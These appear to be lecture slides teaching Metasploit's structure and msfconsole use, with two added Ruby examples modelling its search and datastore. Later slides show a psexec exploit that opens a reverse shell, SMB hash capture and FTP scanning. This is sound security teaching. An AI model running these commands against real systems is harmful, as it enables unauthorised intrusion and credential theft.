
Page 1: Metasploit - axiom.utm.utoronto.ca

Metasploit

Alexandre Gagne & Andres Meija

Page 2: Outline

● Introduction
● Usage
  ○ Demographics
  ○ Scenarios
● Fundamentals
  ○ Structure & architecture
  ○ Msfconsole
● Workflow
  ○ Auxiliary module
  ○ Exploit module
  ○ Payload module
  ○ Post module
● Conclusion

Page 3: Introduction

Page 4: Overview

Page 5: History

Page 6: Editions

Page 7: Maintenance

https://blog.rapid7.com/tag/vulnerability-management/
https://blog.rapid7.com/tag/metasploit/

Page 8: Usage

Page 9: Demographics

Page 10: Summary

Page 11: Top industries

Page 12: Top countries

Page 13: Distribution of companies (by employee)

Page 14: Distribution of companies (by revenue)

Page 15: Use cases

Page 16: Pentesting

Page 17: Hacking

Page 18: Forensics

Page 19: Education

Page 20: Fundamentals

Page 21: Structure & architecture

Page 22: Structure

Top level directory (/usr/share/metasploit-framework)

Page 23: Structure

Data directory (msf/data)

kali@kali:~# ls /usr/share/metasploit-framework/data/
cpuinfo              ipwn           meterpreter    snmp            webcam
eicar.com            isight.bundle  mime.yml       sounds          wmap
eicar.txt            john.conf      msfcrawler     SqlClrPayload   wordlists
emailer_config.yaml  lab            passivex       templates
exploits             logos          php            vncdll.x64.dll
flash_detector       markdown_doc   post           vncdll.x86.dll

Documentation directory (msf/documentation)

kali@kali:~# ls /usr/share/metasploit-framework/documentation/
changelog.Debian.gz  CONTRIBUTING.md.gz  developers_guide.pdf.gz  README.md
CODE_OF_CONDUCT.md   copyright           modules

Lib directory (msf/lib)

kali@kali:~# ls /usr/share/metasploit-framework/lib/
anemone        msfenv.rb         rbmysql.rb  sqlmap
anemone.rb     net               rex         tasks
enumerable.rb  postgres          rex.rb      telephony
metasm         postgres_msf.rb   robots.rb   telephony.rb
metasploit     rabal             snmp        windows_console_color_support.rb
msf            rbmysql           snmp.rb

Page 24: Structure

Plugins directory (msf/plugins)

kali@kali:~# ls /usr/share/metasploit-framework/plugins/
aggregator.rb      ips_filter.rb  openvas.rb           sounds.rb
alias.rb           komand.rb      pcap_log.rb          sqlmap.rb
auto_add_route.rb  lab.rb         request.rb           thread.rb
beholder.rb        libnotify.rb   rssfeed.rb           token_adduser.rb
db_credcollect.rb  msfd.rb        sample.rb            token_hunter.rb
db_tracker.rb      msgrpc.rb      session_notifier.rb  wiki.rb
event_tester.rb    nessus.rb      session_tagger.rb    wmap.rb
ffautoregen.rb     nexpose.rb     socket_logger.rb

Scripts directory (msf/scripts)

kali@kali:~# ls /usr/share/metasploit-framework/scripts/
meterpreter  ps  resource  shell

Tools directory (msf/tools)

kali@kali:~# ls /usr/share/metasploit-framework/tools/
context  dev  exploit  hardware  memdump  modules  password  recon

Page 25: Structure

Modules directory (msf/modules)

kali@kali:~# ls /usr/share/metasploit-framework/modules/
auxiliary  encoders  exploits  nops  payloads  post

Load modules at runtime

kali@kali:~# msfconsole -m ~/secret-modules/

Load modules after msfconsole is running

msf6 > loadpath
Usage: loadpath </path/to/modules>

Loads modules from the given directory which should contain subdirectories for
module types, e.g. /path/to/modules/exploits

Page 26: Architecture

Page 27: Msfconsole

Page 28: Overview

Launching the msfconsole

kali@kali:~# msfconsole

Getting usage help

kali@kali:~# msfconsole -h

Getting command help

msf6 > help

Page 29: Commands

msf6 > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths

Page 30: info command

msf6 > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index

       Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
     Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    Version: 14774
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  Laurent Gaffie <[email protected]>
  hdm <[email protected]>
  sf <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  445              yes       The target port
  WAIT   180              yes       The number of seconds to wait for the attack to complete.

Payload information:
  Space: 1024

Description:
  This module exploits an out of bounds function table dereference in the SMB
  request validation code of the SRV2.SYS driver included with Windows Vista,
  Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2.
  Windows Vista without SP1 does not seem affected by this flaw.

References:
  http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
  http://www.securityfocus.com/bid/36299
  http://www.osvdb.org/57799
  http://seclists.org/fulldisclosure/2009/Sep/0039.html
  http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf6 > info -h
Usage: info <module name> [mod2 mod3 ...]

Options:
* The flag '-j' will print the data in json format
* The flag '-d' will show the markdown version with a browser. More info, but could be slow.

Queries the supplied module or modules for information. If no module is given,
show info for the currently active module.

Page 31: Module ranking

Page 32: search command

msf6 > help search
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Can query search with specific keywords

msf6 > search CVE:2011-0404

Matching Modules
================

   #  Name                                         Disclosure Date  Rank     Check  Description
   -  ----                                         ---------------  ----     -----  -----------
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average  No     NetSupport Manager Agent Remote Buffer Overflow

Can query search with multiple keywords

msf6 > search cve:2011 author:jduck platform:linux

Matching Modules
================

   Name                                         Disclosure Date  Rank     Description
   ----                                         ---------------  ----     -----------
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average  NetSupport Manager Agent Remote Buffer Overflow
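The keyword matching the two searches above rely on, as an added example that is not part of the slides or of Metasploit's own code: a small Ruby model of `search` in which every keyword must match (AND semantics), `cve:`/`bid:`/`edb:` match by substring inside the module's references, and bare words match the name or description. The catalogue is constructed from the two modules shown on the slides plus one made-up auxiliary entry; the `app` keyword is not modelled.

```ruby
# Added example, not from the slides or the Metasploit project: a model of how
# msfconsole's `search` combines keyword filters. Real Metasploit matches more
# fields and knows more keywords; `app` is deliberately left out here.

# Constructed catalogue: the two modules shown on the slides (references taken
# from the slides' own output) plus one made-up auxiliary entry.
CATALOGUE = [
  { name: 'exploit/linux/misc/netsupport_manager_agent',
    type: 'exploit', platform: 'linux', authors: ['jduck'],
    refs: ['CVE-2011-0404'],
    description: 'NetSupport Manager Agent Remote Buffer Overflow' },
  { name: 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index',
    type: 'exploit', platform: 'windows', authors: ['Laurent Gaffie', 'hdm', 'sf'],
    refs: ['CVE-2009-3103', 'BID-36299', 'OSVDB-57799', 'MS09-050'],
    description: 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference' },
  { name: 'auxiliary/scanner/portscan/tcp', # constructed entry, author made up
    type: 'auxiliary', platform: '', authors: ['example-author'],
    refs: [],
    description: 'TCP Port Scanner' },
].freeze

# Keywords from the slide's `help search` output (app omitted, see above).
KEYWORDS = %w[author bid cve edb name platform ref type].freeze

# "cve:2011 author:jduck linux" -> [[:cve, "2011"], [:author, "jduck"], [:text, "linux"]]
# Keywords are case-insensitive, so "CVE:2011-0404" works exactly as on the slide.
def parse_query(query)
  query.split.map do |term|
    key, value = term.split(':', 2)
    if value && KEYWORDS.include?(key.downcase)
      [key.downcase.to_sym, value.downcase]
    else
      [:text, term.downcase]
    end
  end
end

# A reference keyword matches when some reference of that family contains the
# value: cve:2011 matches CVE-2011-0404, and so does cve:2011-0404.
def ref_match?(mod, family, value)
  mod[:refs].any? { |r| r.downcase.start_with?("#{family}-") && r.downcase.include?(value) }
end

def term_match?(mod, key, value)
  case key
  when :cve, :bid, :edb then ref_match?(mod, key.to_s, value)
  when :ref      then mod[:refs].any? { |r| r.downcase.include?(value) }
  when :author   then mod[:authors].any? { |a| a.downcase.include?(value) }
  when :platform then mod[:platform].downcase.include?(value)
  when :type     then mod[:type] == value
  when :name     then mod[:name].downcase.include?(value)
  else # bare word: matches the module name or its description
    mod[:name].downcase.include?(value) || mod[:description].downcase.include?(value)
  end
end

# Every term must match (AND), which is why adding platform:linux narrows the
# slide's first search down to one module. Returns module names in catalogue order.
def search(query, catalogue = CATALOGUE)
  terms = parse_query(query)
  return [] if terms.empty?
  catalogue.select { |mod| terms.all? { |key, value| term_match?(mod, key, value) } }
           .map { |mod| mod[:name] }
end

if __FILE__ == $PROGRAM_NAME
  ['cve:2011 author:jduck platform:linux', 'CVE:2011-0404', 'type:auxiliary'].each do |q|
    puts "#{q} => #{search(q).inspect}"
  end
end
```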

Page 33: use/back commands

msf6 > use ms09_050_smb2_negotiate_func_index
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >

msf6 > use payload/windows/shell_bind_tcp
msf6 payload(windows/shell_bind_tcp) >

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) >

use sets context to a specific module

msf6 payload(windows/shell_bind_tcp) > back
msf6 >

msf6 auxiliary(scanner/portscan/tcp) > back
msf6 >

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > back
msf6 >

back resets context

Page 34: show command (out of module)

msf6 > show

Encoders
========

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/generic_sh                      good    Generic Shell Variable Substitution Command Encoder
   cmd/ifs                             low     Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                   manual  printf(1) via PHP magic_quotes Utility Command Encoder
   ...

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

Page 35: show command (in module)

msf6 > use ms09_050_smb2_negotiate_func_index
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >

show gets new options after use

New options include show targets, show payloads, show options, ...

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show payloads

Compatible Payloads
===================

   Name                       Disclosure Date  Rank    Description
   ----                       ---------------  ----    -----------
   generic/custom                              normal  Custom Payload
   generic/debug_trap                          normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                      normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                   normal  Generic Command Shell, Reverse TCP Inline
   ...

msf6 exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       The target port (TCP)
   WAIT   180              yes       The number of seconds to wait for the attack to complete.

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

Page 36: set/unset/setg/unsetg commands

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134
RHOST => 172.16.194.134

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > unset RHOST
Unsetting RHOST...

msf6 > setg WAIT 2
WAIT => 2

msf6 > unsetg WAIT
Unsetting WAIT...

set sets a parameter locally; setg sets a parameter globally

unset resets a set parameter locally; unsetg resets a set parameter globally

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > unset all
Flushing datastore...

msf6 > save
Saved configuration to: /home/kali/.msf4/config

unset all resets all set parameters locally; save saves the current environment and settings
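The local-versus-global behaviour described above, as an added example that is not part of the slides or of Metasploit's own code: a simplified Ruby model of the two-level datastore in which a module-local value shadows a global one, `unset` falls back to the global value, `unset all` flushes only the local layer, and `save`/`load` round-trip both layers through a YAML file whose layout is an assumption (the real ~/.msf4/config format is not reproduced).

```ruby
# Added example, not from the slides or Metasploit's own code: a simplified model of
# the datastore that set/unset/setg/unsetg/save operate on. Real Metasploit also
# layers option defaults underneath; here a module-local value shadows a global one
# and removing the local value falls back to the global one.
require 'yaml'
require 'tempfile'

class Datastore
  attr_reader :global, :local

  def initialize(global = {})
    @global = global   # shared by every module context (setg / unsetg)
    @local  = {}       # this module's own settings (set / unset)
  end

  # set: module-local value; shadows any global value with the same name
  def set(key, value)
    @local[key.upcase] = value
  end

  # setg: visible in every module unless a local value shadows it
  def setg(key, value)
    @global[key.upcase] = value
  end

  def unset(key)
    @local.delete(key.upcase)
  end

  def unsetg(key)
    @global.delete(key.upcase)
  end

  # "unset all": flush the local datastore; global values are untouched
  def unset_all
    @local.clear
  end

  # Lookup order: local first, then global, then nil (not set anywhere)
  def fetch(key)
    k = key.upcase
    @local.key?(k) ? @local[k] : @global[k]
  end

  # "save": persist both layers. Real msfconsole writes ~/.msf4/config with a
  # global section plus one section per module; this YAML layout is an assumption.
  def save(path, module_name)
    File.write(path, YAML.dump({ 'global' => @global, module_name => @local }))
  end

  def self.load(path, module_name)
    data = YAML.safe_load(File.read(path)) || {}
    ds = new(data.fetch('global', {}))
    data.fetch(module_name, {}).each { |k, v| ds.set(k, v) }
    ds
  end
end

MODULE_NAME = 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index'.freeze

# Replay the slide's command sequence and record what each step leaves visible
# from the exploit module and from a second module sharing the same global store.
def walkthrough
  global  = {}
  exploit = Datastore.new(global)   # msf6 exploit(...) > prompt
  scanner = Datastore.new(global)   # another module context, same global layer
  log = []

  exploit.set('RHOST', '172.16.194.134')   # set RHOST 172.16.194.134
  exploit.setg('WAIT', 2)                  # setg WAIT 2
  log << [:after_setg, exploit.fetch('WAIT'), scanner.fetch('WAIT')]        # [2, 2]

  exploit.set('WAIT', 180)                 # a local value shadows the global one
  log << [:after_local_set, exploit.fetch('WAIT'), scanner.fetch('WAIT')]   # [180, 2]

  exploit.unset('WAIT')                    # unset WAIT: falls back to the global value
  log << [:after_unset, exploit.fetch('WAIT'), scanner.fetch('WAIT')]       # [2, 2]

  exploit.unsetg('WAIT')                   # unsetg WAIT: gone for every module
  log << [:after_unsetg, exploit.fetch('WAIT'), scanner.fetch('WAIT')]      # [nil, nil]

  exploit.setg('WAIT', 2)
  exploit.unset_all                        # unset all: RHOST gone, global WAIT intact
  log << [:after_unset_all, exploit.fetch('RHOST'), exploit.fetch('WAIT')]  # [nil, 2]
  log
end

# save, then load into a fresh console: RHOST returns as local, WAIT as global.
def save_and_reload
  ds = Datastore.new
  ds.set('RHOST', '172.16.194.134')
  ds.setg('WAIT', 2)
  Tempfile.create('msf4-config') do |f|
    ds.save(f.path, MODULE_NAME)
    fresh = Datastore.load(f.path, MODULE_NAME)
    [fresh.fetch('RHOST'), fresh.fetch('WAIT'), fresh.local.key?('WAIT')]
  end
end
```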

Page 37: Common parameters

● Payload type
  ○ Command - payload that executes a command remotely
  ○ Meterpreter - payload that provides a command line remotely (meterpreter shell)
● Connection type
  ○ Auto - switches between bind and reverse automatically
  ○ Bind - uses a bind connection
  ○ Reverse - uses a reverse connection
● LHOST - address of local host
● LPORT - port of local host (for reverse connections)
● RHOST - address of target
● RPORT - port of target
● Target settings - specifies target OS and version
● Exploit timeout - defines timeout time for exploit, in minutes

Page 38: Workflow

Page 39: Overview

Page 40: Auxiliary module

Page 41: Overview

Types

● Admin
● Scanner
● Server

Admin auxiliary modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/admin
2wire    atg        chromecast  dns         firetv  kerberos  misc      mssql   netbios     oracle    sap            smb       tftp      vmware   webmin
android  aws        db2         edirectory  hp      ldap      motorola  mysql   networking  pop2      scada          sunrpc    tikiwiki  vnc      wemo
appletv  backupexec dcerpc      emc         http    maxdb     ms        natpmp  officescan  postgres  serverprotect  teradata  upnp      vxworks  zend

Scanner auxiliary modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner
acpp      dcerpc         emc     h323  jenkins   misc      mssql   nfs    pop3      rdp        scada  ssl        ubiquiti  voice
afp       dect           etcd    http  kademlia  mongodb   mysql   nntp   portmap   redis      sip    steam      udp       vxworks
backdoor  discovery      finger  ike   llmnr     motorola  natpmp  ntp    portscan  rogue      smb    telephony  upnp      winrm
chargen   dlsw           ftp     imap  lotus     mqtt      nessus  openvas postgres  rservices  smtp   telnet     varnish   wproxy
couchdb   dns            gopher  ip    mdns      msf       netbios oracle printer   rsync      snmp   teradata   vmware    wsdd
db2       elasticsearch  gprs    ipmi  memcached msmail    nexpose pcanywhere quake  sap        ssh    tftp       vnc       x11

Server auxiliary modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/server
android_browsable_msf_launch.rb  dhcp.rb           jsse_skiptls_mitm_proxy.rb             pxeexploit.rb                       webkit_xslt_dropper.rb
android_mercury_parseuri.rb      dns               local_hwbridge.rb                      regsvr32_command_delivery_server.rb  wget_symlink_file_write.rb
browser_autopwn2.rb              fakedns.rb        ms15_134_mcl_leak.rb                   socks_proxy.rb                      wpad.rb
browser_autopwn.rb               ftp.rb            netbios_spoof_nat.rb                   socks_unc.rb
capture                          http_ntlmrelay.rb openssl_altchainsforgery_mitm_proxy.rb teamviewer_uri_smb_redirect.rb
dhclient_bash_env.rb             icmp_exfil.rb     openssl_heartbeat_client_memory.rb     tftp.rb

Page 42: Structure

Auxiliary type (modules/auxiliary)

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary
admin    bnat    cloud    docx  example.py  fileformat  gather  pdf      server   spoof  voip
analyze  client  crawler  dos   example.rb  fuzzers     parser  scanner  sniffer  sqli   vsploit

Tool type (modules/auxiliary/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner
acpp       dns            ike        misc      netbios     portscan   scada      teradata  winrm
afp        elasticsearch  imap       mongodb   nexpose     postgres   sip        tftp      wproxy
backdoor   emc            ip         motorola  nfs         printer    smb        ubiquiti  wsdd
chargen    etcd           ipmi       mqtt      nntp        quake      smtp       udp       x11
couchdb    finger         jenkins    msf       ntp         rdp        snmp       upnp
db2        ftp            kademlia   msmail    openvas     redis      ssh        varnish
dcerpc     gopher         llmnr      mssql     oracle      rogue      ssl        vmware
dect       gprs           lotus      mysql     pcanywhere  rservices  steam      vnc
discovery  h323           mdns       natpmp    pop3        rsync      telephony  voice
dlsw       http           memcached  nessus    portmap     sap        telnet     vxworks

Tool (modules/auxiliary/*/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ssh
e_karaf_command_execution.rb  fortinet_backdoor.rb    ssh_enum_git_keys.rb      ssh_login.rb
cerberus_sftp_enumusers.rb    juniper_backdoor.rb     ssh_enumusers.rb          ssh_version.rb
detect_kippo.rb               karaf_login.rb          ssh_identify_pubkeys.rb
eaton_xpert_backdoor.rb       libssh_auth_bypass.rb   ssh_login_pubkey.rb

Page 43: Commands

msf6 > use /scanner/afp/afp_login
msf6 auxiliary(scanner/afp/afp_login) > help
...
Auxiliary Commands
==================

    Command   Description
    -------   -----------
    check     Check to see if a target is vulnerable
    exploit   This is an alias for the run command
    rcheck    Reloads the module and checks if the target is vulnerable
    recheck   This is an alias for the rcheck command
    reload    Reloads the auxiliary module
    rerun     Reloads and launches the auxiliary module
    rexploit  This is an alias for the rerun command
    run       Launches the auxiliary module

Using an auxiliary module adds new auxiliary-specific commands

Page 44: Example (admin auxiliary)

1. Pick the module

msf6 > use auxiliary/admin/vmware/poweron_vm

2. Set the module parameters

msf6 auxiliary(poweron_vm) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf6 auxiliary(poweron_vm) > set RPORT 443
RPORT => 443
msf6 auxiliary(poweron_vm) > set VM XPSP3CloneMe
VM => XPSP3CloneMe
msf6 auxiliary(poweron_vm) > set USERNAME root
USERNAME => root
msf6 auxiliary(poweron_vm) > set PASSWORD password
PASSWORD => password

3. Run the module

msf6 auxiliary(poweron_vm) > run

[+] VM Powered On Successfully
[*] Auxiliary module execution completed

Page 45: Example (scanner auxiliary)

1. Pick the module

msf6 > use auxiliary/scanner/ftp/anonymous

2. Set the module parameters

msf6 auxiliary(anonymous) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf6 auxiliary(anonymous) > set THREADS 55
THREADS => 55

3. Run the module

msf6 auxiliary(anonymous) > run

[*] 192.168.1.222:21 Anonymous READ (220 mailman FTP server (Version wu-2.6.2-5) ready.)
[*] 192.168.1.205:21 Anonymous READ (220 oracle2 Microsoft FTP Service (Version 5.0).)
[*] 192.168.1.215:21 Anonymous READ (220 (vsFTPd 1.1.3))
[*] 192.168.1.203:21 Anonymous READ/WRITE (220 Microsoft FTP Service)
[*] 192.168.1.227:21 Anonymous READ (220 srv2 Microsoft FTP Service (Version 5.0).)
[*] 192.168.1.204:21 Anonymous READ/WRITE (220 Microsoft FTP Service)
[*] Scanned 27 of 55 hosts (049% complete)
[*] Scanned 51 of 55 hosts (092% complete)
[*] Scanned 52 of 55 hosts (094% complete)
[*] Scanned 53 of 55 hosts (096% complete)
[*] Scanned 54 of 55 hosts (098% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed

Page 46: Example (server auxiliary)

1. Pick the module

msf6 > use auxiliary/server/capture/smb

2. Set the module parameters

msf6 auxiliary(smb) > set JOHNPWFILE /tmp/john.txt
JOHNPWFILE => /tmp/john.txt

3. Run the module

msf6 auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf6 auxiliary(smb) >
[*] Mon Mar 28 10:21:56 -0600 2011
NTLMv1 Response Captured from 192.168.1.195:2111
V-MAC-XP\Administrator OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25 NTHASH:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b

msf6 auxiliary(smb) > jobs -l

Jobs
====

  Id  Name
  --  ----
  2   Auxiliary: server/capture/smb

msf6 auxiliary(smb) > kill 2
Stopping job: 2...

[*] Server stopped.

Page 48: Exploit module

Page 49: Overview

Types

● Active
● Passive

Active exploits
1. Exploit a specific host
2. Run until completion
3. Exit

Passive exploits
1. Wait for incoming hosts
2. Exploit them as they connect

Active exploit modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/windows/smb
generic_smb_dll_injection.rb  ms06_025_rasmans_reg.rb     ms09_050_smb2_negotiate_func_index.rb  psexec.rb
group_policy_startup.rb       ms06_025_rras.rb            ms10_046_shortcut_icon_dllloader.rb    smb_delivery.rb
ipass_pipe_exec.rb            ms06_040_netapi.rb          ms10_061_spoolss.rb                    smb_doublepulsar_rce.rb
ms03_049_netapi.rb            ms06_066_nwapi.rb           ms15_020_shortcut_icon_dllloader.rb    smb_relay.rb
ms04_007_killbill.rb          ms06_066_nwwks.rb           ms17_010_eternalblue.rb                timbuktu_plughntcommand_bof.rb
ms04_011_lsass.rb             ms06_070_wkssvc.rb          ms17_010_eternalblue_win8.py           webexec.rb
ms04_031_netdde.rb            ms07_029_msdns_zonename.rb  ms17_010_psexec.rb
ms05_039_pnp.rb               ms08_067_netapi.rb          netidentity_xtierrpcpipe.rb

Passive exploit modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/windows/browser
adobe_cooltype_sing.rb                   hp_loadrunner_writefilestring.rb    ms13_055_canchor.rb
adobe_flash_avm2.rb                      hpmqc_progcolor.rb                  ms13_059_cflatmarkuppointer.rb
adobe_flash_casi32_int_overflow.rb       hyleos_chemviewx_activex.rb         ms13_069_caret.rb
adobe_flash_copy_pixels_to_byte_array.rb ibmegath_getxmlvalue.rb             ms13_080_cdisplaypointer.rb
adobe_flash_domain_memory_uaf.rb         ibmlotusdomino_dwa_uploadmodule.rb  ms13_090_cardspacesigninhelper.rb
adobe_flash_filters_type_confusion.rb    ibm_spss_c1sizer.rb                 ...

Page 50: Structure

Operating system (modules/exploits)

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits
aix      apple_ios  bsdi    example_linux_priv_esc.rb  example.rb         firefox  hpux  linux
android  bsd        dialup  example.py                 example_webapp.rb  freebsd  irix  mainframe

Tool type (modules/exploits/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/linux
antivirus  ftp    http  imap   misc   pop3      pptp   redis  smtp  ssh     upnp
browser    games  ids   local  mysql  postgres  proxy  samba  snmp  telnet

Tool (modules/exploits/*/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/exploits/linux/ssh
ceragon_fibeair_known_privkey.rb             quantum_dxi_known_privkey.rb
cisco_ucs_scpuser.rb                         quantum_vmpro_backdoor.rb
exagrid_known_privkey.rb                     solarwinds_lem_exec.rb
f5_bigip_known_privkey.rb                    symantec_smg_ssh.rb
ibm_drm_a3user.rb                            vmware_vdp_known_privkey.rb
loadbalancerorg_enterprise_known_privkey.rb  vyos_restricted_shell_privesc.rb
mercurial_ssh_exec.rb

Page 51: Commands

msf6 > use ms09_050_smb2_negotiate_func_index
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > help
...
Exploit Commands
================

    Command   Description
    -------   -----------
    check     Check to see if a target is vulnerable
    exploit   Launch an exploit attempt
    rcheck    Reloads the module and checks if the target is vulnerable
    recheck   Alias for rcheck
    reload    Just reloads the module
    rerun     Alias for rexploit
    rexploit  Reloads the module and launches an exploit attempt
    run       Alias for exploit

Using an exploit module adds new exploit-specific commands

msf6 exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf6 exploit(ms08_067_netapi) >

Can run in background with -j

msf6 exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

Can list shells with -l

msf6 exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Can control shells with -i #

Page 52: Example (active exploit)

1. Pick the module

msf6 > use exploit/windows/smb/psexec

2. Set the module parameters

msf6 exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf6 exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf6 exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(psexec) > set LPORT 4444
LPORT => 4444
msf6 exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf6 exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t

3. Run the module

msf6 exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Page 53: Example (passive exploit)

1. Pick the module

msf6 > use exploit/windows/browser/ani_loadimage_chunksize

2. Set the module parameters

msf6 exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf6 exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf6 exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444

3. Run the module

msf6 exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
